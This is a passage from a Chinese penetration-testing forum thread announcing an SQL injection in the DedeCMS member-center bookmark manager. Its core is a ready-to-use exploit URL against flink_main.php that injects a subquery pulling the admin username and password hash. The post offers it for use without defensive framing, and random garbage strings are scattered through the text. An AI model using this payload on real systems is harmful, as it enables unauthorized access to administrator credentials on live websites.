中国网络渗透测试联盟
标题:
DedeCMS会员中心书签管理SQL注射漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:21
标题:
DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
6 e. Z3 x0 e) E0 x: C0 Z
需要magic_quotes_gpc = Off
! ?6 \4 @7 T# W5 p: V; @
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
& @% x# M5 |! Z8 a- o) W+ |4 Q, s8 F
6 K+ j) O: ^* _( B- T* ?
DedeCMS会员中心书签管理SQL注射漏洞
( {! H7 `1 s# N/ v( c( P
成功利用该漏洞可获得管理员密码
9 @, j. ]" j- D
* p4 d9 |: J9 F, |, E( v
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
9 j% x0 R2 z7 L8 h0 t5 s( n
% w; Z4 F# \2 |$ _6 b4 B
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
" k& }& Z4 j0 O t8 L9 ]! M2 R1 X
作者:
kook
时间:
2013-1-10 01:33
#89 顶起。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2